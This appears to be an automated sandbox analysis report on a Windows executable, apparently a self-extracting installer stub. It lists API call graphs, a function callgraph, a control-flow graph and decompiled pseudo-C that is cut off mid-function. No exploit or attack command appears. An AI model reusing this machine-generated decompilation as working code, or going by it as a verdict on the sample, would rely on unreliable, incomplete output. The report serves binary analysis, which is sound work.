8d468f 7 API calls 2809->2810 2811 8d417d LocalAlloc 2810->2811 2812 8d41a8 2811->2812 2813 8d4195 2811->2813 2815 8d468f 7 API calls 2812->2815 2814 8d44b9 20 API calls 2813->2814 2816 8d41a6 2814->2816 2817 8d41b5 2815->2817 2816->2472 2818 8d41c5 lstrcmpA 2817->2818 2819 8d41b9 2817->2819 2818->2819 2820 8d41e6 LocalFree 2818->2820 2821 8d44b9 20 API calls 2819->2821 2820->2816 2821->2820 2823 8d171e _vsnprintf 2822->2823 2833 8d62c9 FindResourceA 2823->2833 2825 8d62cb LoadResource LockResource 2826 8d6353 2825->2826 2829 8d62e0 2825->2829 2827 8d6ce0 4 API calls 2826->2827 2828 8d51ca 2827->2828 2828->2671 2828->2672 2830 8d631b FreeResource 2829->2830 2831 8d6355 FreeResource 2829->2831 2832 8d171e _vsnprintf 2830->2832 2831->2826 2832->2833 2833->2825 2833->2826 2835 8d551a 2834->2835 2836 8d548a 2834->2836 2905 8d58c8 2835->2905 2894 8d53a1 2836->2894 2838 8d5581 2842 8d6ce0 4 API calls 2838->2842 2841 8d5495 2841->2838 2845 8d550c 2841->2845 2846 8d54c2 GetSystemInfo 2841->2846 2847 8d559a 2842->2847 2843 8d554d 2843->2838 2852 8d597d 34 API calls 2843->2852 2844 8d553b CreateDirectoryA 2848 8d5577 2844->2848 2849 8d5547 2844->2849 2850 8d658a CharPrevA 2845->2850 2854 8d54da 2846->2854 2847->2709 2858 8d2630 GetWindowsDirectoryA 2847->2858 2851 8d6285 GetLastError 2848->2851 2849->2843 2850->2835 2853 8d557c 2851->2853 2855 8d555c 2852->2855 2853->2838 2854->2845 2856 8d658a CharPrevA 2854->2856 2855->2838 2857 8d5568 RemoveDirectoryA 2855->2857 2856->2845 2857->2838 2859 8d266f 2858->2859 2860 8d265e 2858->2860 2862 8d6ce0 4 API calls 2859->2862 2861 8d44b9 20 API calls 2860->2861 2861->2859 2863 8d2687 2862->2863 2863->2697 2863->2711 2865 8d696e GetDiskFreeSpaceA 2864->2865 2866 8d69a1 2864->2866 2865->2866 2867 8d6989 MulDiv 2865->2867 2866->2719 2867->2866 2869 8d59dd GetDiskFreeSpaceA 2868->2869 2870 8d59bb 2868->2870 2872 8d5ba1 memset 2869->2872 2873 8d5a21 MulDiv 2869->2873 2871 8d44b9 20 API calls 2870->2871 2874 8d59cc 2871->2874 2875 8d6285 GetLastError 2872->2875 2873->2872 2876 8d5a50 GetVolumeInformationA 2873->2876 2877 8d6285 GetLastError 2874->2877 2878 8d5bbc GetLastError FormatMessageA 2875->2878 2879 8d5a6e memset 2876->2879 2880 8d5ab5 SetCurrentDirectoryA 2876->2880 2881 8d59d1 2877->2881 2882 8d5be3 2878->2882 2883 8d6285 GetLastError 2879->2883 2888 8d5acc 2880->2888 2887 8d6ce0 4 API calls 2881->2887 2884 8d44b9 20 API calls 2882->2884 2885 8d5a89 GetLastError FormatMessageA 2883->2885 2886 8d5bf5 SetCurrentDirectoryA 2884->2886 2885->2882 2886->2881 2889 8d5c11 2887->2889 2890 8d5b0a 2888->2890 2892 8d5b20 2888->2892 2889->2697 2891 8d44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 8d268b 2892->2917 2898 8d53bf 2894->2898 2895 8d171e _vsnprintf 2895->2898 2896 8d658a CharPrevA 2897 8d53fa RemoveDirectoryA GetFileAttributesA 2896->2897 2897->2898 2899 8d544f CreateDirectoryA 2897->2899 2898->2895 2898->2896 2900 8d5415 GetTempFileNameA 2898->2900 2899->2900 2901 8d543a 2899->2901 2900->2901 2902 8d5429 DeleteFileA CreateDirectoryA 2900->2902 2903 8d6ce0 4 API calls 2901->2903 2902->2901 2904 8d5449 2903->2904 2904->2841 2906 8d58d8 2905->2906 2906->2906 2907 8d58df LocalAlloc 2906->2907 2908 8d5919 2907->2908 2909 8d58f3 2907->2909 2913 8d658a CharPrevA 2908->2913 2910 8d44b9 20 API calls 2909->2910 2911 8d5906 2910->2911 2912 8d6285 GetLastError 2911->2912 2915 8d5534 2911->2915 2912->2915 2914 8d5931 CreateFileA LocalFree 2913->2914 2914->2911 2916 8d595b CloseHandle GetFileAttributesA 2914->2916 2915->2843 2915->2844 2916->2911 2918 8d26b9 2917->2918 2919 8d26e5 2917->2919 2920 8d171e _vsnprintf 2918->2920 2921 8d271f 2919->2921 2922 8d26ea 2919->2922 2923 8d26cc 2920->2923 2928 8d171e _vsnprintf 2921->2928 2932 8d26e3 2921->2932 2924 8d171e _vsnprintf 2922->2924 2925 8d44b9 20 API calls 2923->2925 2927 8d26fd 2924->2927 2925->2932 2926 8d6ce0 4 API calls 2929 8d276d 2926->2929 2930 8d44b9 20 API calls 2927->2930 2931 8d2735 2928->2931 2929->2881 2930->2932 2933 8d44b9 20 API calls 2931->2933 2932->2926 2933->2932 2935 8d468f 7 API calls 2934->2935 2936 8d4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 8d5020 2936->2937 2949 8d515f 2936->2949 2938 8d5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2938 2939 8d5057 2937->2939 2938->2939 2953 8d4efd 2939->2953 2942 8d507c 2945 8d44b9 20 API calls 2942->2945 2948 8d5075 2942->2948 2943 8d5060 2944 8d44b9 20 API calls 2943->2944 2944->2948 2945->2948 2946 8d511d 2950 8d513a 2946->2950 2951 8d44b9 20 API calls 2946->2951 2947 8d5110 FreeResource 2947->2946 2948->2946 2948->2947 2949->2737 2950->2949 2952 8d514c SendMessageA 2950->2952 2951->2950 2952->2949 2954 8d4f4a 2953->2954 2955 8d4980 25 API calls 2954->2955 2960 8d4fa1 2954->2960 2958 8d4f67 2955->2958 2956 8d6ce0 4 API calls 2957 8d4fc6 2956->2957 2957->2942 2957->2943 2959 8d4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 8d255b 2961->2962 2963 8d2510 2961->2963 2965 8d6ce0 4 API calls 2962->2965 2964 8d658a CharPrevA 2963->2964 2966 8d2522 WritePrivateProfileStringA _lopen 2964->2966 2967 8d2569 2965->2967 2966->2962 2968 8d2548 _llseek _lclose 2966->2968 2967->2747 2968->2962 2970 8d1b25 2969->2970 3074 8d1a84 2970->3074 2972 8d1b57 2973 8d658a CharPrevA 2972->2973 2974 8d1b8c 2972->2974 2973->2974 2975 8d66c8 2 API calls 2974->2975 2976 8d1bd1 2975->2976 2977 8d1bd9 CompareStringA 2976->2977 2978 8d1d73 2976->2978 2977->2978 2979 8d1bf7 GetFileAttributesA 2977->2979 2980 8d66c8 2 API calls 2978->2980 2981 8d1c0d 2979->2981 2982 8d1d53 2979->2982 2983 8d1d7d 2980->2983 2981->2982 2987 8d1a84 2 API calls 2981->2987 2986 8d1d64 2982->2986 2984 8d1df8 LocalAlloc 2983->2984 2985 8d1d81 CompareStringA 2983->2985 2984->2986 2988 8d1e0b GetFileAttributesA 2984->2988 2985->2984 2995 8d1d9b 2985->2995 2989 8d44b9 20 API calls 2986->2989 2992 8d1c31 2987->2992 2990 8d1e1d 2988->2990 2991 8d1e45 2988->2991 3004 8d1d6c 2989->3004 2990->2991 3080 8d2aac 2991->3080 2993 8d1c50 LocalAlloc 2992->2993 2997 8d1a84 2 API calls 2992->2997 2993->2986 3000 8d1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->3000 2994 8d6ce0 4 API calls 2996 8d1ea1 2994->2996 2995->2995 2998 8d1dbe LocalAlloc 2995->2998 2996->2752 2997->2993 2998->2986 3002 8d1de1 2998->3002 3003 8d1cf8 3000->3003 3008 8d1cc2 3000->3008 3007 8d171e _vsnprintf 3002->3007 3005 8d1d09 GetShortPathNameA 3003->3005 3006 8d1d23 3003->3006 3004->2994 3005->3006 3009 8d171e _vsnprintf 3006->3009 3007->3008 3008->3004 3009->3008 3011 8d209a 3010->3011 3012 8d2256 3010->3012 3014 8d171e _vsnprintf 3011->3014 3017 8d20dc 3011->3017 3013 8d6ce0 4 API calls 3012->3013 3015 8d2263 3013->3015 3016 8d20af RegQueryValueExA 3014->3016 3015->2752 3016->3011 3016->3017 3018 8d20fb GetSystemDirectoryA 3017->3018 3019 8d20e4 RegCloseKey 3017->3019 3020 8d658a CharPrevA 3018->3020 3019->3012 3021 8d211b LoadLibraryA 3020->3021 3022 8d212e GetProcAddress FreeLibrary 3021->3022 3023 8d2179 GetModuleFileNameA 3021->3023 3022->3023 3024 8d214e GetSystemDirectoryA 3022->3024 3025 8d21de RegCloseKey 3023->3025 3028 8d2177 3023->3028 3026 8d2165 3024->3026 3024->3028 3025->3012 3027 8d658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 8d21b7 LocalAlloc 3028->3029 3030 8d21cd 3029->3030 3031 8d21ec 3029->3031 3032 8d44b9 20 API calls 3030->3032 3033 8d171e _vsnprintf 3031->3033 3032->3025 3034 8d2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 8d4016 CreateProcessA 3036->3037 3048 8d4106 3036->3048 3038 8d40c4 3037->3038 3039 8d4041 WaitForSingleObject GetExitCodeProcess 3037->3039 3043 8d6285 GetLastError 3038->3043 3041 8d4070 3039->3041 3040 8d6ce0 4 API calls 3042 8d4117 3040->3042 3107 8d411b 3041->3107 3042->2752 3044 8d40c9 GetLastError FormatMessageA 3043->3044 3046 8d44b9 20 API calls 3044->3046 3046->3048 3047 8d4096 CloseHandle CloseHandle 3047->3048 3049 8d40ba 3047->3049 3048->3040 3049->3048 3051 8d64c2 3050->3051 3052 8d658a CharPrevA 3051->3052 3053 8d64d8 GetFileAttributesA 3052->3053 3054 8d64ea 3053->3054 3055 8d6501 LoadLibraryA 3053->3055 3054->3055 3056 8d64ee LoadLibraryExA 3054->3056 3057 8d6508 3055->3057 3056->3057 3058 8d6ce0 4 API calls 3057->3058 3059 8d6513 3058->3059 3059->2785 3061 8d2289 RegOpenKeyExA 3060->3061 3062 8d2381 3060->3062 3061->3062 3064 8d22b1 RegQueryValueExA 3061->3064 3063 8d6ce0 4 API calls 3062->3063 3065 8d238c 3063->3065 3066 8d2374 RegCloseKey 3064->3066 3067 8d22e6 memset GetSystemDirectoryA 3064->3067 3065->2759 3066->3062 3068 8d230f 3067->3068 3069 8d2321 3067->3069 3070 8d658a CharPrevA 3068->3070 3071 8d171e _vsnprintf 3069->3071 3070->3069 3072 8d233f RegSetValueExA 3071->3072 3072->3066 3075 8d1a9a 3074->3075 3077 8d1aaf 3075->3077 3079 8d1aba 3075->3079 3093 8d667f 3075->3093 3078 8d667f 2 API calls 3077->3078 3077->3079 3078->3077 3079->2972 3081 8d2be6 3080->3081 3082 8d2ad4 GetModuleFileNameA 3080->3082 3083 8d6ce0 4 API calls 3081->3083 3084 8d2b02 3082->3084 3086 8d2bf5 3083->3086 3084->3081 3085 8d2af1 IsDBCSLeadByte 3084->3085 3087 8d2bca CharNextA 3084->3087 3088 8d2b11 CharNextA CharUpperA 3084->3088 3090 8d2bd3 CharNextA 3084->3090 3092 8d2b43 CharPrevA 3084->3092 3098 8d65e8 3084->3098 3085->3084 3086->3004 3087->3090 3088->3084 3089 8d2b8d CharUpperA 3088->3089 3089->3084 3090->3084 3092->3084 3095 8d6689 3093->3095 3094 8d6648 IsDBCSLeadByte 3094->3095 3095->3094 3096 8d66a5 3095->3096 3097 8d6697 CharNextA 3095->3097 3096->3075 3097->3095 3099 8d65f4 3098->3099 3099->3099 3100 8d65fb CharPrevA 3099->3100 3101 8d6611 CharPrevA 3100->3101 3102 8d661e 3101->3102 3103 8d660b 3101->3103 3104 8d663d 3102->3104 3105 8d6634 CharNextA 3102->3105 3106 8d6627 CharPrevA 3102->3106 3103->3101 3103->3102 3104->3084 3105->3104 3106->3104 3106->3105 3108 8d4132 3107->3108 3110 8d412a 3107->3110 3111 8d1ea7 3108->3111 3110->3047 3112 8d1ed3 3111->3112 3113 8d1eba 3111->3113 3112->3110 3114 8d256d 15 API calls 3113->3114 3114->3112 3116 8d2026 3115->3116 3117 8d1ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 8d200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3228 8d19e0 3229 8d1a24 GetDesktopWindow 3228->3229 3230 8d1a03 3228->3230 3231 8d43d0 11 API calls 3229->3231 3232 8d1a16 EndDialog 3230->3232 3233 8d1a20 3230->3233 3234 8d1a33 LoadStringA SetDlgItemTextA MessageBeep 3231->3234 3232->3233 3235 8d6ce0 4 API calls 3233->3235 3234->3233 3236 8d1a7e 3235->3236 3237 8d6a20 __getmainargs 3238 8d69b0 3239 8d69b5 3238->3239 3247 8d6fbe GetModuleHandleW 3239->3247 3241 8d69c1 __set_app_type __p__fmode __p__commode 3242 8d69f9 3241->3242 3243 8d6a0e 3242->3243 3244 8d6a02 __setusermatherr 3242->3244 3249 8d71ef _controlfp 3243->3249 3244->3243 3246 8d6a13 3248 8d6fcf 3247->3248 3248->3241 3249->3246 3250 8d34f0 3251 8d3504 3250->3251 3252 8d35b8 3250->3252 3251->3252 3253 8d35be GetDesktopWindow 3251->3253 3254 8d351b 3251->3254 3258 8d3671 EndDialog 3252->3258 3261 8d3526 3252->3261 3255 8d43d0 11 API calls 3253->3255 3256 8d354f 3254->3256 3257 8d351f 3254->3257 3259 8d35d6 3255->3259 3256->3261 3262 8d3559 ResetEvent 3256->3262 3260 8d352d TerminateThread EndDialog 3257->3260 3257->3261 3258->3261 3263 8d361d SetWindowTextA CreateThread 3259->3263 3264 8d35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3259->3264 3260->3261 3265 8d44b9 20 API calls 3262->3265 3263->3261 3266 8d3646 3263->3266 3264->3263 3267 8d3581 3265->3267 3268 8d44b9 20 API calls 3266->3268 3269 8d359b SetEvent 3267->3269 3270 8d358a SetEvent 3267->3270 3268->3252 3271 8d3680 4 API calls 3269->3271 3270->3261 3271->3252 3272 8d6ef0 3273 8d6f2d 3272->3273 3275 8d6f02 3272->3275 3274 8d6f27 ?terminate@ 3274->3273 3275->3273 3275->3274 3276 8d7270 _except_handler4_common

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                            callgraph 0 Function_008D468F 1 Function_008D2A89 2 Function_008D268B 31 Function_008D44B9 2->31 59 Function_008D6CE0 2->59 80 Function_008D171E 2->80 3 Function_008D658A 34 Function_008D16B3 3->34 4 Function_008D6285 5 Function_008D1A84 115 Function_008D667F 5->115 6 Function_008D1781 7 Function_008D6380 8 Function_008D3680 9 Function_008D4980 9->31 116 Function_008D487A 9->116 10 Function_008D1680 10->6 11 Function_008D5C9E 11->3 11->10 11->31 37 Function_008D66C8 11->37 58 Function_008D31E0 11->58 11->59 82 Function_008D5C17 11->82 87 Function_008D6E2A 11->87 11->115 12 Function_008D4E99 12->10 13 Function_008D6298 13->59 13->80 14 Function_008D6495 14->3 14->6 14->59 15 Function_008D1F90 22 Function_008D1EA7 15->22 15->31 15->59 16 Function_008D2390 16->3 16->10 16->16 16->34 16->59 17 Function_008D6793 18 Function_008D2AAC 18->10 38 Function_008D17C8 18->38 53 Function_008D65E8 18->53 18->59 19 Function_008D66AE 20 Function_008D2CAA 20->0 20->11 20->16 27 Function_008D18A3 20->27 20->31 49 Function_008D36EE 20->49 20->59 83 Function_008D6517 20->83 21 Function_008D6FA5 96 Function_008D724D 21->96 104 Function_008D256D 22->104 23 Function_008D53A1 23->3 23->10 23->59 23->80 24 Function_008D6FA1 25 Function_008D55A0 25->0 25->3 25->4 25->6 25->31 25->59 25->83 95 Function_008D2630 25->95 103 Function_008D6952 25->103 108 Function_008D5467 25->108 114 Function_008D597D 25->114 26 Function_008D4CA0 50 Function_008D17EE 27->50 27->59 28 Function_008D3BA2 28->0 28->4 28->6 28->14 28->31 46 Function_008D3FEF 28->46 51 Function_008D1AE8 28->51 28->59 86 Function_008D202A 28->86 109 Function_008D2267 28->109 29 Function_008D72A2 30 Function_008D6FBE 100 Function_008D6F54 30->100 31->10 35 Function_008D67C9 31->35 31->59 78 Function_008D681F 31->78 31->80 32 Function_008D52B6 32->6 32->16 32->53 56 Function_008D1FE1 32->56 32->59 33 Function_008D69B0 33->30 47 Function_008D71EF 33->47 74 Function_008D7000 33->74 118 Function_008D6C70 33->118 34->6 35->17 36 Function_008D58C8 36->3 36->4 36->10 36->31 97 Function_008D6648 37->97 39 Function_008D4CC0 40 Function_008D4BC0 41 Function_008D30C0 42 Function_008D63C0 42->3 42->6 42->59 43 Function_008D4CD0 43->9 43->12 43->59 61 Function_008D47E0 43->61 76 Function_008D4702 43->76 94 Function_008D4C37 43->94 105 Function_008D476D 43->105 110 Function_008D4B60 43->110 44 Function_008D4AD0 44->8 45 Function_008D43D0 45->59 46->4 46->31 46->59 81 Function_008D411B 46->81 48 Function_008D6BEF 49->1 49->31 49->35 52 Function_008D28E8 49->52 49->59 49->78 50->59 51->3 51->5 51->6 51->10 51->18 51->31 51->34 51->37 51->59 51->80 52->1 119 Function_008D2773 52->119 54 Function_008D70EB 55 Function_008D51E5 55->0 55->4 55->31 57 Function_008D4FE0 57->0 57->31 63 Function_008D4EFD 57->63 67 Function_008D6CF0 59->67 60 Function_008D24E0 60->3 60->59 61->10 61->31 62 Function_008D19E0 62->45 62->59 63->9 63->59 63->110 64 Function_008D70FE 65 Function_008D66F9 66 Function_008D2BFB 66->15 66->20 66->32 77 Function_008D2F1D 66->77 68 Function_008D34F0 68->8 68->31 68->45 69 Function_008D6EF0 70 Function_008D490C 71 Function_008D7208 72 Function_008D3100 72->45 73 Function_008D4200 75 Function_008D6C03 75->96 76->10 76->34 77->3 77->4 77->25 77->28 77->31 77->55 77->59 79 Function_008D621E 77->79 89 Function_008D3B26 77->89 92 Function_008D3A3F 77->92 77->104 106 Function_008D4169 77->106 107 Function_008D5164 77->107 78->59 78->65 79->4 79->31 79->59 79->114 81->22 83->31 84 Function_008D7010 85 Function_008D3210 85->3 85->31 85->36 85->45 88 Function_008D4224 85->88 85->114 86->3 86->31 86->59 86->80 87->67 88->10 88->31 89->13 89->57 89->83 90 Function_008D7120 91 Function_008D6A20 92->0 92->4 92->31 92->83 93 Function_008D6C3F 95->31 95->59 98 Function_008D6F40 99 Function_008D7155 100->71 100->96 101 Function_008D4A50 102 Function_008D3450 102->45 104->60 105->19 105->83 106->0 106->31 107->0 107->13 107->31 108->3 108->4 108->6 108->10 108->23 108->36 108->59 108->114 109->3 109->59 109->80 111 Function_008D6A60 111->66 111->71 111->93 111->96 111->99 112 Function_008D7060 111->112 112->84 112->90 113 Function_008D6760 114->2 114->4 114->31 114->59 115->97 116->70 117 Function_008D7270 119->3 119->6 119->10 119->59

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 36 8d3ba2-8d3bd9 37 8d3bfd-8d3bff 36->37 38 8d3bdb-8d3bee call 8d468f 36->38 40 8d3c03-8d3c28 memset 37->40 45 8d3bf4-8d3bf7 38->45 46 8d3d13-8d3d30 call 8d44b9 38->46 42 8d3c2e-8d3c40 call 8d468f 40->42 43 8d3d35-8d3d48 call 8d1781 40->43 42->46 51 8d3c46-8d3c49 42->51 50 8d3d4d-8d3d52 43->50 45->37 45->46 58 8d3f4d 46->58 53 8d3d9e-8d3db6 call 8d1ae8 50->53 54 8d3d54-8d3d6c call 8d468f 50->54 51->46 56 8d3c4f-8d3c56 51->56 53->58 69 8d3dbc-8d3dc2 53->69 54->46 65 8d3d6e-8d3d75 54->65 60 8d3c58-8d3c5e 56->60 61 8d3c60-8d3c65 56->61 63 8d3f4f-8d3f63 call 8d6ce0 58->63 66 8d3c6e-8d3c73 60->66 67 8d3c75-8d3c7c 61->67 68 8d3c67-8d3c6d 61->68 71 8d3d7b-8d3d98 CompareStringA 65->71 72 8d3fda-8d3fe1 65->72 73 8d3c87-8d3c89 66->73 67->73 76 8d3c7e-8d3c82 67->76 68->66 74 8d3dc4-8d3dce 69->74 75 8d3de6-8d3de8 69->75 71->53 71->72 77 8d3fe8-8d3fea 72->77 78 8d3fe3 call 8d2267 72->78 73->50 80 8d3c8f-8d3c98 73->80 74->75 79 8d3dd0-8d3dd7 74->79 81 8d3dee-8d3df5 75->81 82 8d3f0b-8d3f15 call 8d3fef 75->82 76->73 77->63 78->77 79->75 85 8d3dd9-8d3ddb 79->85 86 8d3c9a-8d3c9c 80->86 87 8d3cf1-8d3cf3 80->87 88 8d3fab-8d3fd2 call 8d44b9 LocalFree 81->88 89 8d3dfb-8d3dfd 81->89 92 8d3f1a-8d3f1c 82->92 85->81 93 8d3ddd-8d3de1 call 8d202a 85->93 95 8d3c9e-8d3ca3 86->95 96 8d3ca5-8d3ca7 86->96 87->53 91 8d3cf9-8d3d11 call 8d468f 87->91 88->58 89->82 90 8d3e03-8d3e0a 89->90 90->82 97 8d3e10-8d3e19 call 8d6495 90->97 91->46 91->50 99 8d3f1e-8d3f2d LocalFree 92->99 100 8d3f46-8d3f47 LocalFree 92->100 93->75 103 8d3cb2-8d3cc5 call 8d468f 95->103 96->58 104 8d3cad 96->104 113 8d3e1f-8d3e36 GetProcAddress 97->113 114 8d3f92-8d3fa9 call 8d44b9 97->114 108 8d3fd7-8d3fd9 99->108 109 8d3f33-8d3f3b 99->109 100->58 103->46 112 8d3cc7-8d3ce8 CompareStringA 103->112 104->103 108->72 109->40 112->87 115 8d3cea-8d3ced 112->115 116 8d3e3c-8d3e80 113->116 117 8d3f64-8d3f76 call 8d44b9 FreeLibrary 113->117 126 8d3f7c-8d3f90 LocalFree call 8d6285 114->126 115->87 120 8d3e8b-8d3e94 116->120 121 8d3e82-8d3e87 116->121 117->126 124 8d3e9f-8d3ea2 120->124 125 8d3e96-8d3e9b 120->125 121->120 128 8d3ead-8d3eb6 124->128 129 8d3ea4-8d3ea9 124->129 125->124 126->58 131 8d3eb8-8d3ebd 128->131 132 8d3ec1-8d3ec3 128->132 129->128 131->132 133 8d3ece-8d3eec 132->133 134 8d3ec5-8d3eca 132->134 137 8d3eee-8d3ef3 133->137 138 8d3ef5-8d3efd 133->138 134->133 137->138 139 8d3eff-8d3f09 FreeLibrary 138->139 140 8d3f40 FreeLibrary 138->140 139->99 140->100
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E008D3BA2() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				short _v300;
                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                            				void _v348;
                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                                                                                            				short _v364;
                                                                                                                                                                                                                                            				char* _v368;
                                                                                                                                                                                                                                            				intOrPtr _v372;
                                                                                                                                                                                                                                            				void* _v376;
                                                                                                                                                                                                                                            				intOrPtr _v380;
                                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                                                                                            				void* _v408;
                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                            				short _t96;
                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                                                                                            				int _t112;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                                                            				short _t137;
                                                                                                                                                                                                                                            				char* _t140;
                                                                                                                                                                                                                                            				signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0x8d9124 =  *0x8d9124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0x8d8a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0x8d8c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E008D468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E008D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E008D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E008D3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
